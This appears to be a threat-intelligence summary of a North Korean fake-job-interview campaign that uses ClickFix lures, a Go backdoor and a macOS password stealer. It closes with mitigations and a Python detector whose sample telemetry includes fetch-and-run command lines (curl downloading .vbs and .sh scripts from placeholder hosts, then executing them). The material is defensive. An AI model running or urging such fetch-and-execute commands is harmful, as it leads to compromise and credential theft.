Full Report
The North Korean threat actors behind Contagious Interview have adopted the increasingly popular ClickFix social engineering tactic to lure job seekers in the cryptocurrency sector to deliver a previously undocumented Go-based backdoor called GolangGhost on Windows and macOS systems. The new activity, assessed to be a continuation of the campaign, has been codenamed ClickFake Interview by
Analysis Summary
# Threat Actor: Contagious Interview (Lazarus Group sub-activity)
## Attribution & Identity
Attributed to the **Lazarus Group**, which is known to be sponsored by the **Reconnaissance General Bureau (RGB)** of the **Democratic People's Republic of Korea (DPRK)** (North Korea).
**Known Aliases/Associated Groups:**
* Contagious Interview
* DeceptiveDevelopment
* DEV#POPPER
* Famous Chollima
* Associated with the broader Lazarus Group activities, including Operation Dream Job and similar fake job interview schemes.
## Activity Summary
This activity, recently codenamed **ClickFake Interview**, represents a continuation of the Contagious Interview campaign, active since at least December 2022. The core activity involves using social engineering tactics—specifically the **ClickFix** methodology—through **fake job offers** distributed via LinkedIn or X to attract targets. Victims are lured into downloading malware disguised as necessary software (e.g., videoconferencing tools) or open-source projects. In the latest iteration, victims are directed to a fake video interviewing service (Willo). The operation has shown a **significant operational shift** by primarily targeting **Centralized Finance (CeFi) entities** rather than the previously documented focus on Decentralized Finance (DeFi) entities. This activity is also linked to the broader DPRK fraudulent IT worker scheme expanding into Europe.
## Tactics, Techniques & Procedures
- **Social Engineering:** Utilizes fake job offers and impersonation (luring targets via LinkedIn/X).
- **ClickFix Technique:** Exploits user trust during a "video interview" process. When a user attempts to enable their camera, they are presented with a fake error requiring a "driver update," prompting them to download and execute malicious files via command-line instructions.
- **Execution (Windows):** Targets are prompted to open Command Prompt and execute a `curl` command to fetch a Visual Basic Script (VBS), which then runs a batch script to launch the backdoor.
- **Execution (macOS):** Targets are prompted to open Terminal and run a `curl` command to fetch a shell script, which then runs a second shell script to execute the stealer module and the backdoor.
- **Credential Harvesting:** The FROSTYFERRET stealer module displays a fake "Chrome update" window, prompting the user to enter their system password, which is exfiltrated.
## Targeting
- **Sectors:** Cryptocurrency sector, specifically **Centralized Finance (CeFi) entities**. This is a notable shift from prior focus on DeFi.
- **Geography:** The expansion of related IT worker schemes indicates an increased focus on **Europe**, although previous campaigns targeted US victims as well.
- **Victims:** Impersonated major cryptocurrency companies including **Coinbase, KuCoin, Kraken, Circle, Securitize, BlockFi, Tether, Robinhood, and Bybit**. Positions targeted included **business development, asset management, product development, and decentralized finance specialists**, rather than just traditional software development roles.
## Tools & Infrastructure
- **Malware Families Used:**
  - **GolangGhost:** A previously undocumented Go-based backdoor used to facilitate remote control and data theft (file upload/download, host info gathering, browser data exfiltration).
  - **FROSTYFERRET (aka ChromeUpdateAlert):** A stealer module deployed on macOS targeting system passwords via a fake browser prompt.
  - **FERRET:** Malware family previously linked to Lazarus Group's click-based campaigns, which leads to the deployment of the GolangGhost backdoor in this iteration.
- **Infrastructure:** Exfiltration destination for stolen credentials was observed to be a **Dropbox location**.
## Implications
This activity demonstrates the Lazarus Group's continuous adaptation to current economic trends (cryptocurrency industry) and operational security developments (using ClickFix instead of just direct file downloads). The shift in targeting from DeFi to CeFi indicates a move toward potentially higher-value centralized institutions. Furthermore, the widening scope of the associated IT worker scheme into Europe highlights a sustained effort by North Korea to generate illicit revenue globally, utilizing social engineering and exploiting common work-from-home/BYOD environments.
## Mitigations
- **Incident Response:** Be aware of the specific ClickFix workflow used during job interviews involving fake driver updates or required software installation.
- **Endpoint Security:** Implement robust endpoint detection and response (EDR) capable of detecting and blocking suspicious command-line executions (`curl` commands initiating scripts) and VBS/batch file execution chains.
- **User Training:** Conduct targeted security awareness training focusing on sophisticated, multi-step social engineering attacks like ClickFix, especially for hiring managers and new employees in time-sensitive recruitment processes.
- **System Hardening:** Review BYOD policies; deploy security tools and logging on all personal devices used for corporate work where possible, as these devices are being specifically targeted.
- **Credential Security:** Implement Multi-Factor Authentication (MFA) widely, as password theft alone may not grant access to critical network resources.
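As an added example (not code from the report or from any vendor), the following Python detector correlates the two-stage execution chain described under the TTPs (a user-typed `curl` that writes a VBS or shell script to disk, followed by an interpreter launching that same file) from process-creation telemetry, the kind of EDR logic the Endpoint Security mitigation calls for. The event fields, hosts, paths and `.invalid` URLs are constructed placeholders, not indicators from the campaign.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events (shape loosely follows Sysmon
# Event ID 1 / EDR telemetry); hosts, paths and .invalid URLs are placeholders.
EVENTS = [
    {"ts": 100, "host": "win-1", "parent": "cmd.exe", "image": "curl.exe",
     "cmdline": r"curl -o C:\Users\a\AppData\Local\Temp\drv.vbs https://placeholder.invalid/drv"},
    {"ts": 103, "host": "win-1", "parent": "cmd.exe", "image": "wscript.exe",
     "cmdline": r"wscript C:\Users\a\AppData\Local\Temp\drv.vbs"},
    {"ts": 105, "host": "win-1", "parent": "wscript.exe", "image": "cmd.exe",
     "cmdline": r"cmd /c C:\Users\a\AppData\Local\Temp\run.bat"},
    {"ts": 200, "host": "mac-1", "parent": "zsh", "image": "curl",
     "cmdline": "curl -s -o /tmp/drv.sh https://placeholder.invalid/drv"},
    {"ts": 202, "host": "mac-1", "parent": "zsh", "image": "sh",
     "cmdline": "sh /tmp/drv.sh"},
    {"ts": 300, "host": "dev-2", "parent": "bash", "image": "curl",  # benign
     "cmdline": "curl -o /tmp/status.json https://placeholder.invalid/status"},
]

SHELLS = {"cmd.exe", "powershell.exe", "bash", "zsh", "sh"}
INTERPRETERS = {"wscript.exe", "cscript.exe", "cmd.exe", "sh", "bash", "zsh"}
SCRIPT_PATH = re.compile(r"(\S+\.(?:vbs|bat|cmd|sh|ps1))\b", re.IGNORECASE)
WINDOW = 600  # seconds allowed between the download and the script launch


def detect_clickfix_chains(events):
    """Alert when curl, run from an interactive shell, writes a script to disk
    and an interpreter on the same host later executes that same file."""
    pending = defaultdict(dict)  # host -> {script path (lowercased): download event}
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        image, parent = ev["image"].lower(), ev["parent"].lower()
        m = SCRIPT_PATH.search(ev["cmdline"])
        if not m:
            continue
        path = m.group(1).lower()
        if image in ("curl", "curl.exe") and parent in SHELLS:
            pending[ev["host"]][path] = ev          # stage 1: user-typed download
        elif image in INTERPRETERS:
            dl = pending[ev["host"]].get(path)      # stage 2: the file is executed
            if dl and ev["ts"] - dl["ts"] <= WINDOW:
                alerts.append({"host": ev["host"], "script": m.group(1),
                               "download_ts": dl["ts"], "exec_ts": ev["ts"]})
    return alerts


if __name__ == "__main__":
    for a in detect_clickfix_chains(EVENTS):
        print(f"[ALERT] {a['host']}: {a['script']} fetched at {a['download_ts']}, run at {a['exec_ts']}")
```

On the constructed events this fires once per host for `win-1` and `mac-1` and stays silent on the benign JSON download; in production the same correlation would key on file-write events rather than the `-o` argument alone.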